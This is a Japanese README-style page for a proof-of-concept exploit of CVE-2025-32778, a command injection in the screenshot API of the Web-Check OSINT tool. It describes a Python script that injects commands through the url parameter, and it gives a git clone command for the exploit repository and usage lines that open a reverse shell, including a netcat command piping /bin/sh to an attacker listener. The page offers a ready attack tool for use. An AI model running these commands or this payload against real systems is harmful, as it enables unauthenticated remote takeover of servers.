
CVE-2025-32778のPoCエクスプロイト: Web-Check OSINTツールにおけるコマンドインジェクション
CVE-2025-32778 は、Lissy93 による Web-Check OSINT ツールにおける重大なコマンドインジェクションの脆弱性です。
認証されていない攻撃者が、スクリーンショット API の url パラメータを介して任意のシステムコマンドを実行することを可能にします。
この Python スクリプトは、エクスプロイトを自動化し、リバースシェルを生成したり、カスタムシェルペイロードを受け入れたりできます。
url コマンドインジェクションを悪用します。--lhost と --lport を使用したリバースシェル。--shell を使用したカスタムシェル。--shell と --lhost/--lport の組み合わせを防止します。pip install requests
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
python3 cve-2025-32778.py -h
ターゲット URL を scheme://host[:port] に正規化します。
ペイロードを準備します:
--lhost と --lport を使用してリバースシェルを生成します。--shell を使用して raw シェルコマンドを使用します。シェルペイロードを安全な URL インジェクションのためにエンコードします。
ペイロードを含む HTTP GET リクエストを /api/screenshot/ に送信します。
リバースシェル接続を待ちます。
00xCanelo
GitHub プロフィール